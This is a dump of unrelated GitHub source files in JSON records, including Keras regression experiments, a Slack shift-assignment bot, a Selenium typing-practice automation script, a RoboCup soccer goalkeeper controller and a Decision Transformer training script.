name)\n\n\n\n","repo_name":"stlukey/Complexity","sub_path":"complexity/quizzes/the_modulus.py","file_name":"the_modulus.py","file_ext":"py","file_size_in_byte":24203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31827045328","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 20 16:55:17 2017\n\n@author: Stein\n\"\"\"\n\n# Import the libraries\nprint ('[INFO] loading computational backend...')\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import r2_score\n\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\n# Encoding categorical data\n# Encoding the Independent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_X = LabelEncoder()\nX[:, 3] = labelencoder_X.fit_transform(X[:, 3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX = onehotencoder.fit_transform(X).toarray()\n\n# Splitting the dataset into Training set and Test set\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, \n random_state = 0)\n\n\n# Define the base model\ndef baseline_model():\n # Create the model\n model = Sequential()\n \n model.add(Dense(6, input_dim = 6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(1, kernel_initializer = 'normal'))\n \n # Compile the model\n model.compile(loss = 'mean_squared_error', optimizer = 'adam')\n return model\n\ndef large_model():\n # Create the model : 6 inputs -> [13 -> 6] -> 1 output\n model = Sequential()\n \n model.add(Dense(6, input_dim = 6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(1, kernel_initializer = 'normal'))\n \n # Compile the model\n model.compile(loss = 'mean_squared_error', optimizer = 'adam')\n return model\n\ndef wide_model():\n # Create the model : 6 inputs -> [20] -> 1 output\n model = Sequential()\n \n model.add(Dense(20, input_dim = 6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(1, kernel_initializer = 'normal'))\n \n # Compile the model\n model.compile(loss = 'mean_squared_error', optimizer = 'adam')\n return model\n\ndef wide_large_model():\n # Create the model : 6 inputs -> [20 -> 6] -> 1 output\n model = Sequential()\n \n model.add(Dense(20, input_dim = 6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(6, \n kernel_initializer = 'normal',\n activation = 'relu'))\n \n model.add(Dense(1, kernel_initializer = 'normal'))\n \n # Compile the model\n model.compile(loss = 'mean_squared_error', optimizer = 'adam')\n return model\n\n\n\n# Evaluate the model with non-standardized dataset\nestimator = KerasRegressor(build_fn = large_model,\n nb_epoch = 100,\n batch_size = 5,\n verbose = 1)\n\nestimator.fit(X_train, y_train, batch_size = 5, epochs = 100)\n\ny_pred = estimator.predict(X_test)\n\n# Evaluate model performance\nscore = r2_score (y_test_sc, y_pred)\n\n\n\n# Evaluate the model with standardize dataset - Base line model\nprint ('Evaluating baseline model - standardized data...')\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasRegressor(build_fn = baseline_model,\n epochs = 50,\n batch_size = 5,\n verbose = 1)))\npipeline = Pipeline(estimators)\n\nkfold = KFold(n_splits = 10, random_state = 0)\nresults = cross_val_score(pipeline, X, y, cv = kfold)\nkfold_mlp_mean = accuracy_mlp.mean()\nkfold_mlp_std = accuracy_mlp.std()","repo_name":"steincastillo/ML-Reference","sub_path":"regression_mlp_esc_v2.py","file_name":"regression_mlp_esc_v2.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22111109650","text":"'''\n조민규 선배님의 Flask_Large_Application_Example 에서 흥미롭게 봐서 사용하였습니다.\n'''\nfrom termcolor import colored\n\ndef log(message: str, keyword: str=\"WARN\"):\n if keyword == \"WARN\":\n print(colored('[WARN]', 'yellow'), message)\n elif keyword == \"ERROR\":\n print(colored('[ERROR] ' + message, 'red'))\n elif keyword == \"INFO\":\n print(colored('[INFO]', 'blue'), message)\n else:\n print(colored('[{}]'.format(type), 'cyan'), message)","repo_name":"team-requin/ReQuiz_Backend","sub_path":"app/misc/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37704337559","text":"from LinkedListImpl import ListNode\nfrom LinkedListImpl import createLinkedList\n\ndef hasCycle(head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n if head is None:\n return False\n\n slow = head\n fast = head\n\n while fast and fast.next:\n fast, slow = fast.next.next, slow.next\n if fast == slow:\n return True\n \n return False\n\nif __name__ == \"__main__\":\n arr = [3,2,0,-4]\n l = createLinkedList(arr)\n print(arr)\n print(l.linkedListToString())\n print(l.hasCycle())\n c = l.createCycle(1)\n print(l.hasCycle())","repo_name":"zZestyy/LeetCode","sub_path":"blind75/linked-list/141-LinkedListCycle.py","file_name":"141-LinkedListCycle.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30969494690","text":"import tifffile\nimport os\nfrom scipy import stats, optimize, interpolate\nimport matplotlib.pyplot as plt \nimport numpy as np \nimport matplotlib.dates as mdates\nimport datetime as dt\n\ndef compare_sm_am(value):\n return value[0] > 0 and (value[2] == 0 or value[2] == 8)\ndef compare_sm_pm(value):\n return value[1] > 0 and (value[3] == 0 or value[3] == 8)\ndef compare_lst_day(value):\n return value[5] != 0 and value[7] != 0\ndef compare_lst_night(value):\n return value[4] != 0 and value[6] != 0\ndef compare(typ, val):\n if typ == \"soil_moisture_am\":\n return compare_sm_am(val)\n if typ == \"soil_moisture_pm\":\n return compare_sm_pm(val)\n if typ == \"lst_day\":\n return compare_lst_day(val)\n if typ == \"lst_night\":\n return compare_lst_night(val)\n return false\n\ntypes = {\n \"soil_moisture_am\":0,\n \"soil_moisture_pm\":1,\n \"lst_day\":5,\n \"lst_night\":4,\n}\ndef get_time_series(typ, state, i, j, scale):\n layer = types[typ]\n data_x = []\n data_y = []\n for date in sorted(os.listdir(\"data\")):\n if True:\n img = tifffile.imread(\"data/\" + date + \"/\" + state + \"_\" + date + \".tif\")\n if len(img[i][j]) == 8 and compare(typ, img[i][j]):\n data_y.append(img[i][j][layer]*scale)\n else:\n data_y.append(np.nan)\n data_x.append(dt.datetime.strptime(date,'%Y-%m-%d').date())\n else:\n print(\"error\")\n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m/%d/%Y'))\n plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=100)) \n plt.scatter(data_x, data_y)\n plt.title(typ + \" \" + state + \" for i: \" + str(i) + \" and j: \" + str(j))\n plt.gcf().autofmt_xdate()\n plt.savefig(typ + '_time_series/' + state + '_' + str(i) + '_' + str(j) + '.png') \n plt.clf()\nillinois_grids = [(10,20),(14,34),(19,32),(30,30),(31,41)]\noklahoma_grids = [(10,20),(11,41),(19,24),(19,35),(26,38)]\n\nget_time_series('soil_moisture_am','illinois',27,40, .02)\nget_time_series('soil_moisture_pm','illinois',27,40, .02)\nfor grid in illinois_grids:\n \"\"\"get_time_series('soil_moisture_am','illinois',grid[0],grid[1], 1)\n get_time_series('soil_moisture_pm','illinois',grid[0],grid[1], 1)\n get_time_series('lst_day','illinois',grid[0],grid[1], .02)\"\"\"\n get_time_series('lst_night','illinois',grid[0],grid[1], .02)\n\"\"\"for grid in oklahoma_grids:\n get_time_series('soil_moisture_am','oklahoma',grid[0],grid[1], 1)\n get_time_series('soil_moisture_pm','oklahoma',grid[0],grid[1], 1)\n get_time_series('lst_day','oklahoma',grid[0],grid[1], .02)\n get_time_series('lst_night','oklahoma',grid[0],grid[1], .02)\"\"\"","repo_name":"johnwwalls/soil_moisture","sub_path":"get_time_series.py","file_name":"get_time_series.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15437655267","text":"from slackbot.bot import respond_to\nimport random\n\n@respond_to('shift (.*)')\ndef shift(message, args):\n message.react('+1')\n\n list = args.split()\n\n # Validations\n # 第一引数チェック\n try:\n num_of_groups = int(list[0])\n except:\n message.reply(f'第1引数<グループ数>には数値を入力してね!\\n\"{list[0]}\"はダメだよ!')\n message.react('sweat')\n return\n\n members = list[1:] # メンバー名のリスト\n num_of_members = len(members)\n\n # グループ数 <= メンバー數 であるかチェック\n if num_of_groups > num_of_members:\n message.reply(f'<グループ数>がメンバー数よりも大きいのはだめだよ!うまく分けられないからね!')\n message.react('sweat')\n return\n \n message.send('シフトを振り分けるよ!')\n random.shuffle(members) # リスト内シャッフル\n \n num_of_members_per_group = int(num_of_members / num_of_groups) # グループあたりの人數\n rem = num_of_members % num_of_groups # 余り\n start = 0\n for group_num in range(num_of_groups):\n end = start + num_of_members_per_group\n if rem > 0:\n end += 1\n rem -= 1\n members_by_group = members[start:end]\n \n msg = '```'\n msg += f'【グループ{group_num+1}】\\n'\n for member in members_by_group:\n msg += f'・{member}\\n'\n msg += '```'\n\n message.send(msg)\n\n start = end\n\n message.reply('シフト振り分け終わったよ!')\n\n\n@respond_to('ありがとう')\ndef thanks(message):\n message.react('smile')","repo_name":"konekato/my-slack-bot","sub_path":"plugins/shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19491576891","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom turtlesim.msg import Pose\n#from std_msgs.msg import Float32\nfrom turtlesim_helper.msg import UnitsLabelled\nimport math\n\n\nclass check_sub:\n def __init__(self):\n self.total = 0\n self.Xold = 0\n self.Yold = 0\n self.pub_msg = UnitsLabelled()\n self.pub_msg.units = \"meters\"\n rospy.Subscriber(\"/turtle1/pose\", Pose, self.callback)\n #self.pub_raw=rospy.Publisher(\"output1\",Float32, queue_size=10)\n self.pub_units = rospy.Publisher(\"output1\", UnitsLabelled, queue_size=10)\n self.pub_units.publish(self.pub_msg)\n \n\n def callback(self,msg):\n\n self.total += math.sqrt(pow(msg.x-self.Xold,2)+pow(msg.y-self.Yold,2))\n self.Xold = msg.x\n self.Yold = msg.y\n self.pub_msg.value = self.total\n #self.pub_raw.publish(self.total)\n self.pub_units.publish(self.pub_msg)\n\n\n\nif __name__=='__main__':\n rospy.init_node('check_sub')\n check_sub()\n rospy.spin()\n\n","repo_name":"mdsaifk123/mohammed","sub_path":"packages/homework2_ros/src/check_sub.py","file_name":"check_sub.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35160205409","text":"import arcade\n\nclass Explosao(arcade.Sprite):\n\n def __init__(self,texture_list,img,escala,center_x,center_y,angulo):\n imagem_inicial = img \n super().__init__(filename=imagem_inicial,scale=escala,center_x=center_x,center_y=center_y)\n self.current_texture = 0\n self.textures = texture_list\n self._angle = angulo\n self.tamanho_lista = len(self.textures)\n self.timer = 0\n self.tamanho = 32\n self.escala = escala\n\n def update(self,delta_time):\n self.timer += delta_time\n if self.timer >= 0.04:\n self.current_texture += 1\n if self.current_texture < self.tamanho_lista:\n self.set_texture(self.current_texture)\n else:\n self.kill()\n self.timer = 0\n\nclass Explosao_central(Explosao):\n def __init__(self,texture_list,img=\"img/explosao/explosao_central1.png\",escala=0.66,center_x=0,center_y=0,angulo=0):\n super().__init__(texture_list,img,escala,center_x,center_y,angulo)\n\nclass Explosao_trilho(Explosao):\n def __init__(self,texture_list,img=\"img/explosao/explosao_trilho1.png\",escala=0.66,center_x=0,center_y=0,angulo=0):\n super().__init__(texture_list,img,escala,center_x,center_y,angulo)\n\nclass Explosao_fim(Explosao):\n def __init__(self,texture_list,img=\"img/explosao/explosao_fim1.png\",escala=0.66,center_x=0,center_y=0,angulo=0):\n super().__init__(texture_list,img,escala,center_x,center_y,angulo)\n","repo_name":"vitorueno/BombAnimal","sub_path":"app/bombas/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36464847424","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nwith webdriver.Chrome() as driver:\r\n driver.get('https://manabi-gakushu.benesse.ne.jp/gakushu/typing/homeposition.html')\r\n #driver.get('https://manabi-gakushu.benesse.ne.jp/gakushu/typing/nihongonyuryoku.html')\r\n #driver.get('https://manabi-gakushu.benesse.ne.jp/gakushu/typing/eigonyuryoku.html')\r\n \r\n #time.sleep(1)\r\n \r\n elem = driver.find_element(By.ID, \"goSettingButton\")\r\n elem.click()\r\n elem = driver.find_element(By.ID, \"timeLimitButton\")\r\n elem.click()\r\n #time.sleep(1)\r\n elem.send_keys(Keys.LEFT)\r\n #time.sleep(1)\r\n elem.send_keys(Keys.LEFT)\r\n #time.sleep(1)\r\n elem = driver.find_element(By.CLASS_NAME, \"typingButton\")\r\n elem.click()\r\n\r\n #time.sleep(1)\r\n body_element = driver.find_element(By.TAG_NAME, 'body')\r\n body_element.send_keys(Keys.SPACE)\r\n\r\n time.sleep(3)\r\n\r\n while True:\r\n sentence = driver.find_element(By.ID, \"remaining\").text\r\n print(sentence)\r\n for key in(sentence):\r\n body_element.send_keys(key)\r\n time.sleep(0.05)","repo_name":"masaki1327/Typing-Automation","sub_path":"Typing_Automation.py","file_name":"Typing_Automation.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24173715473","text":"import unified_planning\nfrom unified_planning.shortcuts import *\nfrom unified_planning.test import TestCase\nfrom unified_planning.test.examples import get_example_problems\nfrom unified_planning.transformers.transformer import Transformer\n\nclass TestQuantifiersRemover(TestCase):\n def setUp(self):\n TestCase.setUp(self)\n self.problems = get_example_problems()\n\n def test_transformer(self):\n problem = self.problems['basic'].problem\n a = problem.action('a')\n t = Transformer(problem, 't')\n t._new_problem = problem\n with self.assertRaises(NotImplementedError):\n t.get_rewritten_problem()\n with self.assertRaises(NotImplementedError):\n t.rewrite_back_plan(None)\n","repo_name":"karpase/unified-planning","sub_path":"unified_planning/test/test_transformer.py","file_name":"test_transformer.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"24674319094","text":"# rcj_soccer_player controller - ROBOT B1\n\n# Griffins - Goalkeeper\n\nimport math\nimport time\n\nfrom rcj_soccer_robot import RCJSoccerRobot, TIME_STEP\nfrom Mathematics.Mathematics import Clamp\nfrom Mathematics.Vector2 import Vector2\nimport utils\n\nclass MyRobot1(RCJSoccerRobot):\n def __init__(self, robot):\n super().__init__(robot)\n\n self.position: Vector2 = Vector2.zero\n self.rotation: float = 0\n\n self.ballPosition: Vector2 = Vector2.zero\n self.prevBallPosition: Vector2 = Vector2.zero\n\n GK_BLUE_SPOT: Vector2 = Vector2(0.0, 0.5)\n GK_YELLOW_SPOT: Vector2 = Vector2(0.0, -0.5)\n\n self.attackSpot: Vector2\n self.polarity = 0\n if self.name.startswith('B'):\n self.attackSpot = GK_BLUE_SPOT\n self.polarity = 1\n if self.name.startswith('Y'):\n self.attackSpot = GK_YELLOW_SPOT\n self.polarity = -1\n\n\n def run(self):\n while self.robot.step(TIME_STEP) != -1:\n # Update game data\n self.position = self.get_gps_coordinates()\n self.rotation = self.get_compass_heading()\n\n teamData = []\n\n while self.is_new_team_data():\n teamData.append(self.get_new_team_data())\n\n ballData = {}\n if self.is_new_ball_data():\n ballData = self.get_new_ball_data()\n localBallPosition = utils.ball_position(ballData, self.position, self.rotation)\n\n \n self.ballPosition = utils.avg_ball_position(ballData, self.position, self.rotation, teamData)\n self.send_data_to_team(\n self.player_id,\n self.position,\n utils.ball_position(ballData, self.position, self.rotation)\n )\n\n if self.ballPosition.x == -100:\n self.ballPosition = self.prevBallPosition\n\n self.prevBallPosition = self.ballPosition\n\n ballYDelta = (self.attackSpot.y * self.polarity) - (self.ballPosition.y * self.polarity)\n\n if ballYDelta > 0:\n # The ball is in front of the goalkeeper \n \n if ballYDelta < 0.6:\n if self.position.y < self.attackSpot.y + 0.09 and self.position.y > self.attackSpot.y - 0.09:\n if self.rotation < math.radians(345) and self.rotation > math.radians(15):\n self.RotateTo(math.radians(0), 5)\n else:\n if self.position.y < self.attackSpot.y + 0.07 and self.position.y > self.attackSpot.y - 0.07 and self.RotateTo(math.radians(0), 5):\n pass\n else:\n if self.position.x < self.ballPosition.x:\n if self.position.y < self.attackSpot.y:\n self.SetMotorVelocity(-10, -10 + (abs(self.position.y - self.attackSpot.y)) * 20)\n else:\n self.SetMotorVelocity(-10 + (abs(self.position.y - self.attackSpot.y)) * 20, -10)\n else:\n if self.position.y < self.attackSpot.y:\n self.SetMotorVelocity(10, 10 - (abs(self.position.y - self.attackSpot.y)) * 20)\n else:\n self.SetMotorVelocity(10 - (abs(self.position.y - self.attackSpot.y)) * 20, 10)\n else:\n self.GoToPosition(Vector2(self.position.x, self.attackSpot.y), 10)\n\n else:\n if self.position.y < self.attackSpot.y + 0.09 and self.position.y > self.attackSpot.y - 0.09:\n if self.rotation < math.radians(345) and self.rotation > math.radians(15):\n self.RotateTo(math.radians(0), 5)\n else:\n if self.position.y < self.attackSpot.y + 0.07 and self.position.y > self.attackSpot.y - 0.07 and self.RotateTo(math.radians(0), 5):\n pass\n else:\n if self.position.x < Clamp(self.ballPosition.x, -0.35, 0.35) :\n if self.position.y < self.attackSpot.y:\n self.SetMotorVelocity(-10, -10 + (abs(self.position.y - self.attackSpot.y)) * 20)\n else:\n self.SetMotorVelocity(-10 + (abs(self.position.y - self.attackSpot.y)) * 20, -10)\n else:\n if self.position.y < self.attackSpot.y:\n self.SetMotorVelocity(10, 10 - (abs(self.position.y - self.attackSpot.y)) * 20)\n else:\n self.SetMotorVelocity(10 - (abs(self.position.y - self.attackSpot.y)) * 20, 10)\n else:\n self.GoToPosition(Vector2(self.position.x, self.attackSpot.y), 10)\n else:\n # The ball is behind the goalkeeper\n self.GoToPosition(Vector2(self.ballPosition.x, 0.7 * self.polarity), 10)\n\n\n def Rotate(self, speed):\n # Reversed Positive numbers to be clockwise\n self.SetMotorVelocity(speed, -speed)\n\n def StopMotors(self):\n self.SetMotorVelocity(0, 0)\n\n def RotateTo(self, angle, speed) -> bool:\n # This function should be call in a loop\n # Returns True while rotating\n\n angleDifference = abs(math.degrees(self.rotation) - angle)\n\n if not (angleDifference >= 345 or angleDifference <= 15):\n if math.degrees(self.rotation) < angle:\n if abs(math.degrees(self.rotation) - angle) <= 180:\n self.Rotate(speed)\n else:\n self.Rotate(-speed)\n else:\n if abs(math.degrees(self.rotation) - angle) <= 180:\n self.Rotate(-speed)\n else:\n self.Rotate(speed)\n return True\n else:\n self.StopMotors()\n return False\n\n def GoToPosition(self, position: Vector2, speed) -> bool:\n # This function should be call in a loop\n # Returns True while moving\n\n positionDifference = self.position - position\n angle = math.degrees((self.position - position).GetAngle())\n\n if abs(positionDifference.x) >= 0.02 or abs(positionDifference.y) >= 0.02:\n if not (self.RotateTo(angle, speed)):\n self.GoForward(speed)\n return True\n else:\n self.StopMotors()\n return False\n\n def SetMotorVelocity(self, leftMotor: float, rightMotor: float):\n # Reverse Forward to be positive numbers\n self.left_motor.setVelocity(-leftMotor)\n self.right_motor.setVelocity(-rightMotor)\n\n def GoForward(self, speed):\n self.SetMotorVelocity(speed, speed)\n\n\"\"\"\nimport math\n\nimport utils\nfrom rcj_soccer_robot import RCJSoccerRobot, TIME_STEP\nfrom Mathematics.Vector2 import *\n\nGOALKEEPER_SPOT: Vector2 = Vector2(0, 0.5)\n\nclass MyRobot1(RCJSoccerRobot): \n def run(self):\n # START\n\n # UPDATE\n while self.robot.step(TIME_STEP) != -1:\n if self.is_new_data():\n if self.is_new_ball_data():\n ball_data = self.get_new_ball_data()\n ball_direction = Vector2(ball_data[\"direction\"][0], ball_data[\"direction\"][1])\n ball_angle = angle_between_vectors(Vector2.north, ball_direction)\n\n #print(math.sqrt(1 / ball_data[\"strength\"]))\n\n heading = self.get_compass_heading()\n\n angle = math.degrees(heading) + 270\n\n robot_data = self.get_gps_coordinates()\n robot_position: Vector2 = Vector2(robot_data[0], robot_data[1])\n robot_rotation = (math.degrees(heading) + 270) % 360\n\n\n\n goalkeeper_spot_angle = (angle_between_vectors(Vector2.north, (robot_position - GOALKEEPER_SPOT).Normalized()) + robot_rotation) % 360\n #print(goalkeeper_spot_angle)\n #print(utils.ball_position(ball_data, robot_data, heading)) \n #print(angle)\n\n print(math.degrees(heading))\n\n\n \n\ndef get_direction(ball_angle: float) -> int:\n if ball_angle >= 345 or ball_angle <= 15:\n return 0\n return -1 if ball_angle < 180 else 1\n\ndef angle_between_vectors(vector1: Vector2, vector2: Vector2) -> float:\n return (math.degrees(math.atan2(vector1.y, vector1.x)) - math.degrees(math.atan2(vector2.y, vector2.x)) + 360) % 360\n\n\n\n\n\n\n\n\n\n\n\n def run(self):\n timer: utils.Timer = utils.Timer()\n\n #self.left_motor.setVelocity(7.068)\n #self.right_motor.setVelocity(-7.068)\n\n # Update\n while self.robot.step(TIME_STEP) != -1:\n if self.is_new_data():\n \n # TODO: Get and do something with supervisor data\n #data = self.get_new_data()\n\n #while self.is_new_team_data():\n #team_data = self.get_new_team_data() # noqa: F841\n # Do something with team data\n\n\n # Get ball data\n if self.is_new_ball_data():\n ball_data = self.get_new_ball_data()\n else:\n # If the robot does not see the ball, stop motors\n print(\"Robot does not see the ball\")\n self.left_motor.setVelocity(0)\n self.right_motor.setVelocity(0)\n continue\n\n # Get data from compass\n heading = self.get_compass_heading() # noqa: F841\n\n # Get GPS coordinates of the robot\n robot_pos = self.get_gps_coordinates() # noqa: F841\n \n # Get data from sonars\n #sonar_values = self.get_sonar_values() # noqa: F841\n\n\n #print(math.degrees(math.atan(ball_data[\"direction\"][1] / ball_data[\"direction\"][0])))\n # print(ball_data[\"direction\"])\n\n angle = math.degrees(heading) + 270\n\n if angle > 360:\n angle -= 360\n\n # Set the speed to motors\n\n ballAngle = math.degrees(math.atan2(0, 1)) - math.degrees(math.atan2(ball_data[\"direction\"][1], ball_data[\"direction\"][0]))\n\n if ballAngle < 0:\n ballAngle += 360\n\n ballAngle += 360 - angle\n\n if ballAngle > 360:\n ballAngle -= 360\n\n ballAngle = 360 - ballAngle\n\n #print(1 / math.sqrt(ball_data[\"strength\"]))\n #print(angle)\n\n if angle > 85 and angle < 95:\n print(timer.GetTime())\n self.left_motor.setVelocity(0)\n self.right_motor.setVelocity(0)\n return\n\n elif timer.GetTime() > 4:\n self.left_motor.setVelocity(2.5)\n self.right_motor.setVelocity(2.5)\n\n\n # Send message to team robots\n self.send_data_to_team(self.player_id)\n \"\"\"\n ","repo_name":"robocup-junior/rcj-2022-soccersim-code","sub_path":"004/rcj_soccer_team_blue/robot1.py","file_name":"robot1.py","file_ext":"py","file_size_in_byte":11544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24971453743","text":"import json\nfrom pyassert import *\n\nfrom utils.http_manager import HttpManager\n\n\nclass PatchTests:\n\n def test_partial_update_booking(self, existing_booking_url, test_data):\n \"\"\"\n Checks whether partial update properly updates booking data\n \"\"\"\n data = test_data('test_data/partial_update_booking.json')\n response = HttpManager.patch(existing_booking_url, data=data)\n assert_that(response.status_code).is_equal_to(200)\n assert_that(response.json()['firstname']).is_equal_to(json.loads(data)['firstname'])\n assert_that(response.json()['lastname']).is_equal_to(json.loads(data)['lastname'])\n ","repo_name":"olakowalczyk/PythonAPIAutomationTesting","sub_path":"tests/test_PartialUpdateBooking.py","file_name":"test_PartialUpdateBooking.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13483348813","text":"import gzip\n\nfrom stream.functions.bytes import un_gzip\nfrom stream.io.local import LocalFile\n\n\ndef test_un_gzip(tmpdir):\n file = str(tmpdir / '0.txt.gz')\n with gzip.open(file, mode='wb') as f:\n f.write(b\"\"\"#123\n\n456\n\"\"\")\n\n assert tuple(\n LocalFile(file, mode='rb').stream\n | un_gzip\n ) == (\n b'#123\\n',\n b'\\n',\n b'456\\n',\n )\n","repo_name":"MichaelKim0407/python-stream","sub_path":"tests/functions/test_unzip.py","file_name":"test_unzip.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"29183883452","text":"#! /usr/bin/enc python\n# -*- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\n\"\"\"Main入口For Decision Transformer\"\"\"\nimport gym\nimport numpy as np\nimport torch\n\n# Tensorboard\nfrom tensorboardX import SummaryWriter\n\n# 读offline .pkl dataset\nimport pickle\nimport random\nimport sys\n\n# DT\nfrom model import DecisionTransformer\nfrom train import SequenceTrainer\nfrom eval import evaluate_episode_rtg\n\n# %行为克隆\nfrom model import MLPBCModel\nfrom train import ActTrainer\nfrom eval import evaluate_episode\n\nfrom utils import discount_cumsum,model_save,load_model\n\nimport datetime\n\n# 参数1 - Decision-Transformer for Mujoco Gym\nclass Config:\n env = \"hopper\"\n dataset = \"medium\"\n mode = \"normal\" # \"delayed\" : all rewards moved to end of trajectory\n device = 'cuda'\n log_dir = 'TB_log/'\n record_algo = 'DT_Hopper_v1'\n test_cycles = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\n\n # 模型\n model_type = \"DT\"\n activation_function = 'relu'\n\n # Scalar\n max_length = 20 # max_len # K\n pct_traj = 1.\n batch_size = 64\n embed_dim = 128\n n_layer = 3\n n_head = 1\n dropout = 0.1\n lr = 1e-4\n wd = 1e-4\n # warmup_steps = 1000\n warmup_steps=10\n # num_eval_episodes = 100\n num_eval_episodes = 10\n max_iters = 50\n # num_steps_per_iter = 1000\n num_steps_per_iter = 10\n\n # Bool\n log_to_tb = True\n\ndef main_dt(args=Config()):\n\n device = args.device\n if args.log_to_tb:\n writer = SummaryWriter(logdir=args.log_dir + args.record_algo + '_'+args.test_cycles)\n print(\"建立TB文件夹结束\")\n\n env_name = args.env\n dataset = args.dataset\n\n dataset_path = f'{env_name}-{dataset}-v2.pkl'\n print(\"===== Dataset Path: {} =====\".format(dataset_path))\n\n # 以Hopper作为Test Benchmark\n if env_name == \"hopper\":\n env = gym.make(\"Hopper-v3\")\n print(\"成功装载环境!\")\n state_dim = env.observation_space.shape[0]\n action_dim = env.action_space.shape[0]\n print(\"Observation Space:\", env.observation_space, \"|| Dims: \", state_dim)\n print(\"Action Space:\",env.action_space, \"|| Dims: \", action_dim)\n max_ep_len = 1000\n\n env_targets = [3600, 1800] # 预设的期望奖励值\n\n print(env_targets[:1])\n scale = 1000. # 回报Scale Coeff.\n else:\n raise NotImplementedError\n\n # if args.model_type == 'BC': # 行为克隆算法模型\n env_targets = env_targets[:1] # since BC ignores target, no need for different evaluations\n\n # 数据集读取\n with open(dataset_path, 'rb') as f:\n trajectories = pickle.load(f)\n print(\"数据读取完毕... ...\")\n\n # 将path info分别保存在对应的List内\n mode = args.mode\n states, traj_lens, returns = [], [], []\n for path in trajectories:\n if mode == 'delayed': # 此时回报移动到轨迹的最后\n \"\"\"Delayed版本用于评估稀疏奖励下的算法表现\n 前期没有任何Reward Signal,只有最后才会拿到一个总体的Reward. \n \"\"\"\n path['rewards'][-1] = path['rewards'].sum()\n path['rewards'][:-1] = 0.\n\n states.append(path['observations']) # path['obs'] Dim: (XXX, state_dim) XXX: traj_len(每一个Traj的timesteps)\n traj_lens.append(len(path['observations'])) # path['rw'] Dim: (XXX, )\n returns.append(path['rewards'].sum()) # Returns 累计奖励----回报\n\n # Traj Lens Dims: (2186, )\n # Returns Lens Dims: (2186,)\n # 最大回报: 3222.36\n # 最���回报: 315.87\n traj_lens, returns = np.array(traj_lens), np.array(returns)\n\n # 输入正则化(State)\n states = np.concatenate(states, axis=0)\n state_mean, state_std = np.mean(states, axis=0), np.std(states, axis=0) + 1e-6\n\n # num_timesteps:总共所有path的tp数之和\n num_timesteps = sum(traj_lens)\n\n print('=' * 50)\n print(f'Starting new experiment: {env_name} {dataset}')\n print(f'{len(traj_lens)} trajectories, {num_timesteps} timesteps found')\n print(f'Average return: {np.mean(returns):.2f}, std: {np.std(returns):.2f}')\n print(f'Max return: {np.max(returns):.2f}, min: {np.min(returns):.2f}')\n print('=' * 50)\n\n K = args.max_length\n batch_size = args.batch_size\n num_eval_episodes = args.num_eval_episodes\n pct_traj = args.pct_traj\n\n # 对于行为克隆,只在Top bct_traj 轨迹进行Train (For %BC Experiment)\n num_timesteps = max(int(pct_traj*num_timesteps), 1)\n sorted_inds = np.argsort(returns) # low-to-high 排序\n num_trajectories = 1\n # 拿到分最高的那个traj的tp数\n timesteps = traj_lens[sorted_inds[-1]]\n ind = len(trajectories) - 2\n while ind >= 0 and timesteps + traj_lens[sorted_inds[ind]] < num_timesteps:\n timesteps += traj_lens[sorted_inds[ind]]\n 